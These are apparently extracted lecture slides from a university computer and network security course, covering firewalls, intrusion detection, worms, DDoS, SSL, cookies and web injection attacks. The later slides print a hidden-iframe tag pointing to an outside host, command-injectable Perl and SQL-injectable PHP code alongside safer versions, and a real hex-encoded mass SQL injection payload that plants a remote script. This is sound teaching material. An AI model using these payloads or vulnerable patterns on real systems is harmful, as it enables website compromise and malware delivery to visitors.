• An iptable rule set is evaluated at each

Hook placements:
Preroute

Routing

Input

CIS 433/533: Computer and Network Security

Forward

Postroute

Output

11

iptables Concepts
• Table
‣ All the firewall rules

• Chain
‣ List of rules associated with the chain identifier
‣ E.g., hook name

• Match
‣ When all a rule’s field match the packet (protocol-

specific)

• Target
‣ Operation to execute on a packet given a match
CIS 433/533: Computer and Network Security

12

iptables Commands
iptables [-t <table_name>] <cmd> <chain> <plist>

• Commands
‣ Append rule to end or specific location in chain
‣ Delete a specific rule in a chain
‣ Flush a chain
‣ List a chain
‣ Create a new user-specified chain
‣ Replace a rule
CIS 433/533: Computer and Network Security

13

Test it out
• PING on localhost
‣ ping -c 1 127.0.0.1
• Add iptables rule to block
‣ iptables -A INPUT -s 127.0.0.1 -p icmp -j DROP
• Try ping
• Delete the rule
‣ iptables -D INPUT 1
‣ iptables -D INPUT -s 127.0.0.1 -p icmp -j DROP
‣ iptables -F INPUT

CIS 433/533: Computer and Network Security

14

Testing
• Use loopback to test the rules locally on your machine
‣ IP address 127.0.0.1

• ICMP
‣ submit ping requests to 127.0.0.1 as above

• TCP
‣ submit requests to 127.0.0.1 at specific port
‣ server


nc -l -p 3750



listen at port 3750

‣ client


nc -p 3000 localhost 3750



send from port 3000 to localhost at port 3750

CIS 433/533: Computer and Network Security

15

iptables Rule Parameters
• Destination/Source
‣ IP address range and netmask
• Protocol of packet
‣ ICMP, TCP, etc

• Fragmented only
• Incoming/outgoing interface
• Target on rule match

CIS 433/533: Computer and Network Security

16

Per Protocol Options
• Specialized matching options for rules
‣ Specific to protocol

• TCP
‣ Source/destination ports
‣ SYN
‣ TCP flags

CIS 433/533: Computer and Network Security

17

Targets
• Define what to do with the packet at this time
• ACCEPT/DROP
• QUEUE for user-space application
• LOG any packet that matches
• REJECT drops and returns error packet
• RETURN enables packet to return to previous chain
• <user-specified> passes packet to that chain

CIS 433/533: Computer and Network Security

18

Examples
iptables -A INPUT -s 200.200.200.2 -j ACCEPT
iptables -A INPUT -s 200.200.200.1 -j DROP
iptables -A INPUT -s 200.200.200.1 -p tcp -j DROP
iptables -A INPUT -s 200.200.200.1 -p tcp --dport telnet -j DROP
iptables -A INPUT -p tcp --destination-port telnet -i ppp0 -j DROP

CIS 433/533: Computer and Network Security

19

CIS 433/533 - Computer and
Network Security
Intrusion Detection

Professor Kevin Butler
Winter 2011
Computer and Information Science

Intrusion
• An Authorized Action (or subversion of auth)...
• That Can Lead to a Vulnerability...
• That Turns into a Compromise...
• And an Attack...

• Authentication and Access Control Are No Help!
CIS 433/533: Computer and Network Security

2

Types of Intruders
• Masquerader
‣ an unauthorized entity who subverts access control to

exploit legitimate system user resources

• Misfeasor
‣ a legitimate user who accesses unauthorized data/

programs/resources or who misuses their privilege
‣ The insider threat

• Clandestine user
‣ takes control of a system and evades

auditing/access controls
‣ think rootkits
CIS 433/533: Computer and Network Security

3

Types of Intrusions
• Network
‣ Malformed (and unauthenticated) packet
‣ Let through the firewall
‣ Reaches the network-facing daemon
‣ Can we detect intrusions from packet contents?

• Host
‣ Input to daemon
‣ Triggers a vulnerability (buffer overflow)
‣ Injects attacker code
‣ Performs malicious action
‣ Can we detect intrusions from process behavior?
CIS 433/533: Computer and Network Security

4

Intrusion Detection (def. by Forrest)
• An intrusion detection system (IDS) finds anomalies
‣ “The IDS approach to security is based on the assumption

that a system will not be secure, but that violations of
security policy (intrusions) can be detected by monitoring
and analyzing system behavior.” [Forrest 98]
‣ However you do it, it requires
‣ Training the IDS (training)
‣ Looking for anomalies (detection)

• This is a hot area in computer security, that has led

to lots of new tools, applications, industry, but is also
controversial for a number of reasons
CIS 433/533: Computer and Network Security

5

Intrusion Detection Systems
• IDS’s claim to detect adversary when they are in

the act of attack
‣ Monitor operation
‣ Trigger mitigation technique on detection
‣ Monitor: Network or Host (Application) events

• A tool that discovers intrusions “after the fact” are

called forensic analysis tools
‣ E.g., from system logfiles

• IDS’s really refer to two kinds of detection

technologies
‣ Anomaly Detection
‣ Misuse Detection
CIS 433/533: Computer and Network Security

6

Anomaly Detection
• Compares profile of normal systems operation to

monitored state
‣ Hypothesis: any attack causes enough deviation from profile

(generally true?)

• Q: How do you derive normal operation?
‣ AI: learn operational behavior from training data
‣ Expert: construct profile from domain knowledge

‣ Black-box analysis (vs. white or grey?)

• Q: Will a profile from one environment be good for

others?
• Pitfall: false learning
CIS 433/533: Computer and Network Security

7

Misuse Detection
• Profile signatures of known attacks
‣ Monitor operational state for signature
‣ Hypothesis: attacks of the same kind has enough

similarity to distinguish from normal behavior

• Q: Where do these signatures come from?
‣ Record: recorded progression of known attacks
‣ Expert: domain knowledge

• AI: Learn by negative and positive feedback

CIS 433/533: Computer and Network Security

8

The “confusion matrix”
Detection Result
T
F

•! What constitutes a
intrusion/anomaly is really
just a matter of definition

Abnormal

Normal

Legal

Reality

–! A system can exhibit all
sorts of behavior

True
False
T
Positive Negative
False
True
F
Positive Negative

•! Quality determined by
consistency with a given
definition
–! context sensitive

CIS 433/533: Computer and Network Security

9

Sequences of System Calls
• Forrest et al. in early-mid 90s, understand the

characteristics of an intrusion
Event Stream WRITE

READ

WRITE

SEND

Attack Profile

READ

WRITE

SEND

SEND

• Idea: match sequence of system calls with profiles
– n-grams of system call sequences (learned)
‣ Match sliding windows of sequences
‣ If not found, then trigger anomaly
‣ Use n-grams of length 5, 6, 11.

• If found, then it is normal (w.r.t. learned sequences)
CIS 433/533: Computer and Network Security

10

Evaluating Forrest et al.
• The qualitative measure of detection is the

departure of the trace from the database of ngrams
• Further they measure how far a particular n-gram i
departs by computing the minimum Hamming
distance of the sample from the database
dmin = min( d(i,j) | for all normal j in n-gram database)

this is called the anomaly signal.
• Result: on lpr, sendmail, etc.
‣ About .05-.07% false positive rates
‣ And SA = maximum dmin =~ .04

• Is this good?
CIS 433/533: Computer and Network Security

11

A Gedanken experiment
• Assume a very good anomaly detector (99%)
• And a pretty constant attack rate, where you can

observe 1 out of 10000 events are malicious

• Are you going to detect the adversary well?
CIS 433/533: Computer and Network Security

12

Bayes’ Rule
• Pr(x) function, probability of event x
‣ Pr(sunny) = .8 (80% of sunny day)

• Pr(x|y), probability of x given y
‣ Conditional probability
‣ Pr(cavity|toothache) = .6
• 60% chance of cavity given you have a toothache

‣ Bayes’ Rule (of conditional probability)

Pr(A|B) Pr(B)
Pr(B|A) =
Pr(A)
• Now: Pr(cavity) = .5, Pr(toothache) = .1
CIS 433/533: Computer and Network Security

13

The Base-Rate Bayesian Fallacy
• Setup
‣ Pr(T) is attack probability, 1/10,000
• Pr(T) = .0001

‣ Pr(F) is probability of event flagging, unknown
‣ Pr(F|T) is 99% accurate (higher than most

techniques)
• Pr(F|T) = .99, Pr(!F|T) = .01, Pr(F|!T) = .01, Pr(!F|!T) = .

99

• Deriving Pr(F)
‣ Pr(F) = Pr(F|T)*Pr(T) + Pr(F|!T)*Pr(!T)
‣ Pr(F) = (.99)(.0001) + (.01)(.9999) = .010098
• Now, what’s Pr(T|F)?
CIS 433/533: Computer and Network Security

14

The Bayesian Fallacy (cont.)
• Now plug it in to Bayes Rule
Pr(F|T) Pr(T) Pr(.99) Pr(.0001)
Pr(T|F) =
=
= .0098
Pr(F)
Pr(.010098)

• So, a 99% accurate detector leads to …
‣ 1% accurate detection.
‣ With 99 false positives per true positive
‣ This is a central problem with ID

• Suppression of false positives real issue
‣ Open question, makes some systems unusable
CIS 433/533: Computer and Network Security

15

Where is Anomaly Detection Useful?

System

Attack Density
P(T)

A

0.1

0.65

B

0.001

0.99

C

0.1

0.99

D

0.00001

0.99999

Detector Flagging
Pr(F)

Detector Accuracy
Pr(F|T)

True Positives
P(T|F)

Pr(A|B) Pr(B)
Pr(B|A) =
Pr(A)
CIS 433/533: Computer and Network Security

16

Where is Anomaly Detection Useful?
True Positives
P(T|F)

System

Attack Density
P(T)

Detector Flagging
Pr(F)

Detector Accuracy
Pr(F|T)

A

0.1

0.38

0.65

0.171

B

0.001

0.01098

0.99

0.090164

C

0.1

0.108

0.99

0.911667

D

0.00001

0.00002

0.99999

0.5

Pr(A|B) Pr(B)
Pr(B|A) =
Pr(A)
CIS 433/533: Computer and Network Security

17

Issues in Community
• MIT Lincoln Labs: canonical data set for providing

ground truths (1998/99)
• A lot of publications that came afterward trained

their data using the dataset (whereas those
involved with the challenge didn’t have the dataset)
• Problem: testing using a subset of your training

data
‣ Why is this a problem?

• Result: lots of skepticism

CIS 433/533: Computer and Network Security

18

More current research
• Leveraging data mining and machine learning

techniques to get back to behavior identification
• Getting away from manual specification of attack

models
• Rediscovering a lot of work from the late ‘90s
• a common security theme

CIS 433/533: Computer and Network Security

19

The reality …
• Intrusion detections systems are good at catching

demonstrably bad behavior (and some subtle)
• Alarms are the problem
‣ How do you suppress them?
‣ and not suppress the true positives?
‣ This is a limitation of probabilistic pattern matching, and

nothing to do with bad science

• Beware: the fact that an IDS is not alarming does
not mean the network is safe
• All too often: used as a tool to demonstrate all safe,
but is not really appropriate for that.
CIS 433/533: Computer and Network Security

20

CIS 433/533 - Computer and
Network Security
Worms, DDoS, Web
Professor Kevin Butler
Winter 2011
Computer and Information Science

Worms
• A worm is a self-propagating program.
• As relevant to this discussion
1. Exploits some vulnerability on a target host …
2. (often) embeds itself into a host …
3. Searches for other vulnerable hosts …
4. Goto (1)

CIS 433/533: Computer and Network Security

2

The Danger
• What makes worms so dangerous is that infection

grows at an exponential rate
‣ A simple model:
• s (search) is the time it takes to find vulnerable host
• i (infect) is the time is take to infect a host

‣ Assume that t=0 is the worm outbreak, the number of

hosts at t=j is

(j/(s+i))
2
‣ For example, if (s+i = 1), what # infected at time t=32?
CIS 433/533: Computer and Network Security

3

The result
5,000,000,000

4,500,000,000

4,000,000,000

3,500,000,000

3,000,000,000

2,500,000,000

2,000,000,000

1,500,000,000

1,000,000,000

500,000,000

0

CIS 433/533: Computer and Network Security

4

The Morris Worm
• Robert Morris, doctoral student at Cornell (now MIT prof)
‣ Wrote a small (99 line) program on Nov. 3, 1988
‣ Disabled the Internet

• Worm operation
‣ Reads /etc/password, they tries the obvious choices and

dictionary, /usr/dict words
‣ Used local /etc/hosts.equiv, .rhosts, .forward to identify hosts

that are related
• Tries cracked passwords at related hosts (if necessary)
• Uses whatever services are available to compromise other hosts

‣ Scanned local interfaces for network information
‣ Covered its tracks (set is own process name to sh, prevented

accurate cores, re-forked itself)
CIS 433/533: Computer and Network Security

5

Code Red
• Anatomy of a worm: Maiffret (good reading)
• Exploited a Microsoft IIS web-server vulnerability
‣ A vanilla buffer overflow (allows adversary to run code)
‣ Scans for vulnerabilities over random IP addresses
‣ Sometimes would deface the served website

• July 16th, 2001 - outbreak
‣ CRv1- contained bad randomness (fixed IPs searched)
‣ CRv2 - fixed the randomness,
• added DDOS of www.whitehouse.gov
• Turned itself off and on (on 1st and 16th of month)
‣ August 4 - Code Red II
• Different code base, same exploit
• Added local scanning (biased randomness to local IPs)
• Killed itself in October of 2001
CIS 433/533: Computer and Network Security

6

Worms and infection
• The effectiveness of a worm is determined by how good it is at

identifying vulnerable machines
‣ Morris used local information at the host
‣ Code Red used what?
• Multi-vector worms use lots of ways to infect
‣ E.g., network, DFS partitions, email, drive by downloads …
‣ Another worm, Nimda did this
• Lots of scanning strategies
‣ Signpost scanning (using local information, e.g., Morris)
‣ Random IP - good, but waste a lot of time scanning dark or
unreachable addresses (e.g., Code Red)
‣ Local scanning - biased randomness
‣ Permutation scanning - instance is given part of IP space
CIS 433/533: Computer and Network Security

7

Other scanning strategies
• The doomsday worm: a flash worm
‣ Create a hit list of all vulnerable hosts
• Staniford et al. argue this is feasible
• Would contain a 48MB list

‣ Do the infect and split approach
‣ Use a zero-day vulnerability

5,000,000,000

4,500,000,000

4,000,000,000

3,500,000,000

3,000,000,000

2,500,000,000

2,000,000,000

1,500,000,000

1,000,000,000

500,000,000

0

• Result: saturate the Internet is less than 30 seconds!
CIS 433/533: Computer and Network Security

8

Worms: Defense Strategies
• (Auto) patch your systems: most, if not all, large worm

outbreaks have exploited known vulnerabilities (with patches)
• Heterogeneity: use more than one vendor for your networks
• Filtering: look for unnecessary or unusual communication

patterns, then drop them on the floor
‣ Shield (Wang et al., MSR): provides filtering for known

vulnerabilities, such that they are protected immediately
(analog to virus scanning)
‣ SWORD (Li et al., UOregon): behavior-based worm

detection (causal relationships, continuity)
• Auto-generation of worm signatures
‣ Earlybird (UCSD), vulnerability-based sigs (CMU)
CIS 433/533: Computer and Network Security

9

Denial of Service
• Intentional prevention of access to valued

resource
‣ CPU, memory, disk (system resources)
‣ DNS, print queues, NIS (services)
‣ Web server, database, media server (applications)

• This is an attack on availability (fidelity)
• Note: launching DOS attacks is easy
• Note: preventing DOS attacks is hard
‣ Mitigation the path most frequently traveled
CIS 433/533: Computer and Network Security

10

Request Flood
• Canonical DoS Attack: request flooding
‣ Overwhelm some resource with legitimate requests
‣ e.g., web server, phone system

• Note: unintentional flood is called a flash crowd
CIS 433/533: Computer and Network Security

11

Example: SMURF Attacks
• This is one of the deadliest and simplest of the DOS attacks

(called a naturally amplified attack)
‣ Send a large number PING packet networks on the broadcast IP addresses

(e.g., 192.168.27.254)
‣ Set the source packet IP address to be your victim
‣ All hosts will reflexively respond to the ping at your victim
‣ … and it will be crushed under the load.

‣ Fraggle: UDP based SMURF

Host
Host
adversary

Broadcast

Host
Host

victim

Host
Host

CIS 433/533: Computer and Network Security

Host
Host
Host
12

Distributed denial of service
• DDoS: Network oriented attacks aimed at

preventing access to network, host or service
‣ Saturate the target’s network with traffic
‣ Consume all network resources (e.g., SYN)
‣ Overload a service with requests
• Use “expensive” requests (e.g., “sign this data”)

‣ Can be extremely costly (e.g, Amazon)

• Result: service/host/network is unavailable
• Frequently distributed via other attack
• Note: IP is often hidden (spoofed)
CIS 433/533: Computer and Network Security

13

DDoS
• Send a stream of packets/requests/whatever …
‣ many PINGS, HTML requests, ...

• Send a few malformed packets
‣ causing failures or expensive error handling
‣ low-rate packet dropping (TCP congestion control)
‣ “ping of death”

• Abuse legitimate access
‣ Compromise service/host
‣ Use its legitimate access rights to consume the rights for

domain (e.g., local network)
‣ E.g., First-year graduate student runs a recursive file
operation on root of NFS partition
CIS 433/533: Computer and Network Security

14

Adversary Network
(zombies)
(masters)
(adversary
)

CIS 433/533: Computer and Network Security

(target)

15

Why DDoS
• What would motivate a DDoS?
‣ An axe to grind …
‣ Curiosity (script kiddies) …
‣ Blackmail
‣ Information warfare …

• Internet is an open system ...
‣ Packets not authenticated, probably can’t be
• Would not solve the problem just move it (firewall)

‣ Too many end-points can be remote controlled
CIS 433/533: Computer and Network Security

16

Why is DDoS possible?
• Interdependence - services dependent on each

other
‣ E.g., Web depends on TCP and DNS, which depends on

routing and congestion control, …

• Limited resources (or rather resource imbalances)
‣ Many times it takes few resources on the client side to

consume lots of resources on the server side
‣ E.g., SYN packets consume lots of internal resources
‣ Difference in expected usage and design principles (e.g.,

hooking the mobile phone network up to the Internet)
CIS 433/533: Computer and Network Security

17

DDOS and E2E argument
• E2E (a simplified version): We should design the

network such that all the intelligence is at the
edges.
‣ So that the network can be more robust and scalable
‣ Many think is the main reason why the Internet works

• Downside:
‣ Also, no real ability to police the traffic/content
‣ So, many security solutions break this E2E by cracking

open packets (e.g., application level firewalls)
‣ DDoS is real because of this …
CIS 433/533: Computer and Network Security

18

Simple DDOS Mitigation
• Ingress/Egress Filtering
‣ Helps spoofed sources, not much else

• Better Security
‣ Limit availability of zombies, not feasible
‣ Prevent compromise, viruses, …

• Quality of Service Guarantees (QOS)
‣ Pre- or dynamically allocate bandwidth
‣ E.g., diffserv, RSVP
‣ Helps where such things are available …

• Content replication
‣ E.g,. CDS: Useful for static content
CIS 433/533: Computer and Network Security

19

DOS Prevention - Reverse-Turing Tests
• Turing test: measures whether a human can tell the

difference between a human or computer (AI)
• Reverse Turning tests: measures whether a user on

the internet is a person, a bot, whatever?
• CAPTCHA - completely automated public Turing test

to tell computers and humans apart
‣ contorted image humans can read, computers can’t
‣ image processing pressing SOA, making these harder

• Note: often used not just for DOS prevention, but for

protecting
“free”
services
(email
accounts)
CIS 433/533: Computer and Network Security

20

Problem with CAPTCHAs
• Accessibility

• Crowdsourcing

CIS 433/533: Computer and Network Security

21

DoS Prevention - Puzzles
• Make the solver present evidence of “work” done
‣ If work is proven, then process request
‣ Note: only useful if request processing significantly more work

than

• Puzzle design
‣ Must be hard to solve
‣ Easy to Verify

• Canonical Example
‣ Puzzle: given all but k-bits of r and h(r), where h is a

cryptographic hash function
‣ Solution: Invert h(r)
‣ Q: Assume you are given all but 20 bits, how hard would it be to
solve the puzzle?
CIS 433/533: Computer and Network Security

22

Traceback
• Routers forward packet data to source
‣ Include packets and previous hop …
‣ At low frequency (1/20,000) …

• Targets reconstruct path to source (IP unreliable)
‣ Use per-hop data to look at
‣ Statistics say that the path will be exposed

• Enact standard
‣ Add filters at routers along the path
R1

R1
CIS 433/533: Computer and Network Security

R2

R2

R3

R3

R4
23

Network vs. Web Security

CIS 433/533: Computer and Network Security

24

What is the web?
• A collection of application-layer

services used to distribute content
‣ Web content (HTML)
‣ Multimedia
‣ Email
‣ Instant messaging

• Many applications
‣ News outlets, entertainment, education, research and

technology, …
‣ Commercial, consumer and B2B
CIS 433/533: Computer and Network Security

25

Web security: the high bits
• The largest distributed system in existence
‣ threats are as diverse as applications and users
‣ But need to be thought out carefully …

• The stakeholders are …
‣ Consumers (users, businesses, agents, …)
‣ Providers (web-servers, IM services, …)

• Another way of seeing web security is
‣ Securing the web infrastructure such that the integrity,

confidentiality, and availability of content and user
information is maintained
CIS 433/533: Computer and Network Security

26

Secure Socket Layer (SSL/TLS)
• Used to authenticate servers
‣ Uses certificates, “root” CAs

HTTP

• Can authenticate clients
• Inclusive security protocol

SSL

• Security at the socket layer

TCP

‣ Transport Layer Security (TLS)
‣ Provides

IP

• authentication
• confidentiality
• integrity

CIS 433/533: Computer and Network Security

27

SSL Handshake
(1) Client Hello
(algorithms,…)
Client

(2) Server Hello (alg.
selection, …)
(3) Server Certificate
(4) ClientKeyRequest
(5) ChangeCipherSuite
(6) ChangeCipherSuite
(7) Finished
(8) Finished

CIS 433/533: Computer and Network Security

Server

28

Simplified Protocol Detail
Participants: Alice/A (client) and Bob/B (server)
Crypto Elements : Random R, Certificate C, ki+ Public Key (of i)
Crypto Functions : Hash function H(x), Encryption E(k, d), Decryption D(k, d),
Keyed MAC HM AC(k, d)
1.

Alice → Bob

RA

2.

Bob → Alice
Alice
Alice

RB , CB
pick pre-master secret S
calculate master secret K = H(S, RA , RB )

3.

Alice → Bob
Bob
Bob

+
E(kB
, S), HM AC(K,� CLN T � + [#1, #2])

+
recover pre-master secret S = D(kB
, E(kB
, S))
calculate master secret K = H(S, RA , RB )

4.

Bob → Alice

HM AC(K,� SRV R� + [#1, #2])

Note: Alice and Bob : IV Keys, Encryption Keys, and Integrity Keys 6 keys,where
each key ki = gi (K, RA , RB ), and gi is key generator function.

CIS 433/533: Computer and Network Security

29

Advantages of SSL
• Confidential session
• Server authentication*
• GUI clues for users
• Built into every browser
• Easy to configure on the server
• Protocol has been analyzed like crazy
• Seems like you are getting security “for free”

CIS 433/533: Computer and Network Security

30

Disadvantages of SSL
• Users don’t check certificates
‣ most don’t know what they mean

• Too easy to obtain certificates
• Too many roots in the browsers
• Some settings are terrible
‣ SSL v2 is on
‣ totally insecure cipher suites are included

• very little use of client-side certificates
• performance!
‣ early days had sites turning off
‣ getting better (crypto coprocessors, etc.)
CIS 433/533: Computer and Network Security

31

Reality of SSL
• SSL is here to stay no matter what
• credit card over SSL connection is

probably safer than credit card to waiter
• biggest hurdles:
‣ performance
‣ user education (check those certificates)
‣ too many trusted sites (edit your browser prefs)
‣ misconfiguration (turn off bad ciphersuites)
‣ can be used for many non-web applications
CIS 433/533: Computer and Network Security

32

Cookies
• Cookies were designed to offload server

state to browsers
‣ Not initially part of web tools (Netscape)
‣ Allows users to have cohesive experience
‣ E.g., flow from page to page,

• Someone made a design choice
‣ Use cookies to authenticate and authorize

users
‣ E.g. Amazon.com shopping cart, WSJ.com

CIS 433/533: Computer and Network Security

33

Cookie Issues …
• New design choice means
‣ Cookies must be protected
• Against forgery (integrity)
• Against disclosure (confidentiality)

• Cookies not robust against web

designer mistakes
‣ Were never intended to be
‣ Need the same scrutiny as any other tech.
Many security problems arise out of a technology built for one thing
incorrectly applied to something else.
CIS 433/533: Computer and Network Security

34

Cookie Design 1: mygorilla.com


Requirement: authenticate users on site

mygorilla.com


Design:
1. use digest authentication to login user
2. set cookie containing hashed username
3. check cookie for hashed username

User


Server

Q: Is there anything wrong with this design?

CIS 433/533: Computer and Network Security

35

Cookie Design 2: mygorilla.com


Requirement: authenticate users on site

mygorilla.com


Design:
1. use digest authentication to login user

2. set cookie containing encrypted username
3. check cookie for encrypted username

User


Server

Q: Is there anything wrong with this design?

CIS 433/533: Computer and Network Security

36

Exercise: Cookie Design
• Design a secure cookie for mygorilla.com that

meets the following requirements
• Requirements
‣ Users must be authenticated (assume digest completed)
‣ Time limited (to 24 hours)
‣ Unforgeable (only server can create)
‣ Privacy-protected (username not exposed)
‣ Location safe (cannot be replayed by another host)

CIS 433/533: Computer and Network Security

37

Dynamic Content
• Server generates content at run time
‣ For time-sensitive information (stock ticker)
‣ For user customization (Amazon.com)
‣ Provide HTML interface to complex system (e.g., course

management system)

CIS 433/533: Computer and Network Security

38

Dynamic Content: CGI
• Common Gateway Interface (CGI)
‣ Generic way to call external applications on the server
‣ Passes URL to external program (e.g., form)
‣ Result is captured and return to requestor

• Historically
‣ “shell” scripts used to generate content


Very, very dangerous
Shell

Client

Web Server

Script
(e.g., PHP, ASP,
Perl, Python )

• NOTE: server extensions are also dangerous (e.g., servlets)

CIS 433/533: Computer and Network Security

39

DC: Embedded Scripting
• Program placed directly in content, run at

during request time and output returned in
content
‣ MS active server pages (ASP)
‣ PHP
‣ mod_perl
‣ server-side JavaScript
‣ python, ....

• Nice at generating output
‣ Dangerous if tied to user input
CIS 433/533: Computer and Network Security

40

Warning: Cross-Site Scripting
• Note Assume the following is posted to a message board on

your favorite website:

!!Hello message board.
!!<SCRIPT>malicious code</SCRIPT>
! This is the end of my message.
• Now a reasonable ASP (or some other dynamic content
generator) uses the input to create a webpage (e.g., blogger
nonsense).
• Now a malicious script is now running
‣ Applet, ActiveX control, …

CIS 433/533: Computer and Network Security

41

Dynamic Content Security
• Largely just applications
‣ Inasmuch as application are secure
‣ Command shells, interpreters, are dangerous

• Three things to prevent DC vulnerabilities
‣ Validate input
• Input often received as part of user supplied data
• E.g., cookie

‣ Limit program functionality
• Don’t leave open ended-functionality

‣ Execute with limited privileges

CIS 433/533: Computer and Network Security

42

Web Content (client side)
• All providers serve up content …
• All sorts of technologies to improve content
‣ Interactivity: Forms, CGI, Javascript, …
‣ Web applications: Java, Flash, ActiveX…
‣ Dynamic content: Servlets, Active Server Pages …

• However, these come with risks …
‣ Both clients and servers must use complex and sometimes

untried technologies …
‣ … that have led to some nasty security problems.

CIS 433/533: Computer and Network Security

43

Applications/Plugins
• A plugin is a simply a program used by a browser

to process content
‣ MIME type maps content to plugin
‣ Like any old application (e.g., RealAudio)
‣ Newer browsers have autoinstall features

• A kind of plug-in …
‣ (1997) David.exe
‣ “Free pornography …”

• Moral: beware of plugins
CIS 433/533: Computer and Network Security

44

JavaScript
• Scripting Language used to improve

the quality/experience
‣ Create dialogs, forms, graphs, …
‣ Built upon API functions (lots of different flavors)
‣ No ability to read local files, open connections …

• Security: No ability to read local files, open

connections, but …
‣ DOS – the “infinite popup” script
• Often could not “break out” with restarting computer

‣ Spoofing – easy to create “password” dialogs
CIS 433/533: Computer and Network Security

45

Active X
• ActiveX is a MS windows technology
‣ Really, just a way to run arbitrary code
‣ Called controls (.OCX), just programs
‣ Conforms to MS APIs to interact with web

• Extends user experience in lots of nice ways
‣ Microsoft upgrade service
‣ BIOS Upgrades
‣ Lookup services

• Massive security hole ….
CIS 433/533: Computer and Network Security

46

Is there a concern?
• Initially, MS thought that users would

have no problem with ActiveX controls
‣ Hey, you run programs you buy, right?
‣ With traditional applications
• You (generally) know who the software comes from
• You (generally) have some recourse

‣ On the Internet …
• Neither of the above may be true
• User not actually be involved/aware in execution

CIS 433/533: Computer and Network Security

47

Java
• Platform and language for writing applets
‣ Sun Microsystems platform for set-top boxes
‣ Applets embedded in web pages (or native)
‣ Language loosely resembling C++
‣ Runs in a Java Virtual Machine (JVM)
• Every platform has JVM
• Platform runs arbitrary code (bytecode)
• Hence: one application runs on a bunch of platforms
• Great way to take advantage of the web
• Slow for data/processing intensive applications

CIS 433/533: Computer and Network Security

48

Drive by downloads
• Using a deceptive means to get someone to install something on their

own (spyware/adware)

‣ Once you have one, then it starts downloading lots of others,

their friends, …
‣ Extortion-ware (i.e., crimeware)-- pay us 40$ for our popup
blocker, etc ….
• The real gambit is that they demand 40$ for the uninstall option
CIS 433/533: Computer and Network Security

49

Spyware
• Definition: hidden software that uses local host to

transmit user secrets
‣ e.g., browsing habits, forms data

• Typically found in “free” software
‣ Gnutella, game tools, demo software,

MP3 tools ...)
‣ Implemented using spyware “engines” - gator

• Imbeds in local host to
‣ Adds shared libraries (.dlls), adds to startup as TSR

programs
‣ Often difficult or impossible to remove
• You are never really sure it is gone (advice: reinstalll)
CIS 433/533: Computer and Network Security

50

Malicious IFrame(s)
• An IFRAME is a HTML tag that create an

embedded frame in the content of another page.
‣ This is the attack vector de jour for adversaries

attempting to delivery content that exploits browser
vulnerabilities.
‣ E.g., deliver crafted .jpg or malicious scripting

• The attack occurs when the adversary breaks into

a webserver and places a IFRAME in legitimate
content
‣ e.g., by sniffing passwords, recursively adding IFRAMEs
<iframe src=http://[REMOVED].info/counter style=display:none></iframe>
CIS 433/533: Computer and Network Security

51

CIS 433/533 - Computer and
Network Security
Web Vulnerabilities, Wrapup
Professor Kevin Butler
Winter 2011
Computer and Information Science

Injection Attacks
• flaws relating to invalid input handling which

then influences program execution
‣ often when passed as a parameter to a helper

program or other utility or subsystem

• most often occurs in scripting languages
‣ encourage reuse of other programs / modules
‣ often seen in web CGI scripts

CIS 433/533: Computer and Network Security

Unsafe Perl Script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

#!/usr/bin/perl
# finger.cgi - finger CGI script using Perl5 CGI module
use CGI;
use CGI::Carp qw(fatalsToBrowser);
$q = new CGI;
# create query object
# display HTML header
print $q->header,
$q->start_html('Finger User'),
$q->h1('Finger User');
print "<pre>";
# get name of user and display their finger details
$user = $q->param("user");
print `/usr/bin/finger -sh $user`;
# display HTML footer
print "</pre>";
print $q->end_html;

CIS 433/533: Computer and Network Security

Safer Script
• counter attack by validating input
‣ compare to pattern that rejects invalid input
‣ see example additions to script:

14
15
16
17
18

# get name of user and display their finger details
$user = $q->param("user");
die "The specified user contains illegal characters!"
unless ($user =~ /^\w+$/);
print `/usr/bin/finger -sh $user`;

CIS 433/533: Computer and Network Security

SQL Injection
• another widely exploited injection attack
• when input used in SQL query to database
‣ similar to command injection
‣ SQL meta-characters are the concern
‣ must check and validate input for these
$name = $_REQUEST['name'];
$query = “SELECT * FROM suppliers WHERE name = '" . $name . "';"
$result = mysql_query($query);

$name = $_REQUEST['name'];
$query = “SELECT * FROM suppliers WHERE name = '" .
mysql_real_escape_string($name) . "';"
$result = mysql_query($query);

CIS 433/533: Computer and Network Security

Consequences
• When SQL injection goes bad...

CIS 433/533: Computer and Network Security

6

Real SQL Injection
orderitem.asp?IT=GM-204;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045
0043004C00410052004500200040005400200076006100720063006800610072002800320035
00350029002C0040004300200076006100720063006800610072002800320035003500290020
004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F
007200200043005500520053004F005200200046004F0052002000730065006C006500630074
00200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D
0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F
006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D
0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075
002700200061006E0064002000280062002E00780074007900700065003D003900390020006F
007200200062002E00780074007900700065003D003300350020006F007200200062002E0078
0074007900700065003D0032003300310020006F007200200062002E00780074007900700065
003D00310036003700290020004F00500045004E0020005400610062006C0065005F00430075
00720073006F00720020004600450054004300480020004E004500580054002000460052004F
004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054
004F002000400054002C004000430020005700480049004C0045002800400040004600450054
00430048005F005300540041005400550053003D0030002900200042004500470049004E0020
0065007800650063002800270075007000640061007400650020005B0027002B00400054002B
0027005D00200073006500740020005B0027002B00400043002B0027005D003D007200740072
0069006D00280063006F006E007600650072007400280076006100720063006800610072002C
005B0027002B00400043002B0027005D00290029002B00270027003C00730063007200690070
00740020007300720063003D0068007400740070003A002F002F007700770077002E006E00
6900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F00
7300630072006900700074003E0027002700270029004600450054004300480020004E0045
00580054002000460052004F004D00200020005400610062006C0065005F0043007500720073
006F007200200049004E0054004F002000400054002C0040004300200045004E0044002000
43004C004F005300450020005400610062006C0065005F0043007500720073006F0072002000
4400450041004C004C004F00430041005400450020005400610062006C0065005F00430075
00720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);--

CIS 433/533: Computer and Network Security

7

• Decoded result:
DECLARE @T varchar(255)'@C varchar(255) DECLARE
Table_Cursor CURSOR FOR select a.name'b.name from
sysobjects a'syscolumns b where a.id=b.id and
a.xtype='u' and (b.xtype=99 or b.xtype=35 or
b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH
NEXT FROM Table_Cursor INTO @T'@C WHILE
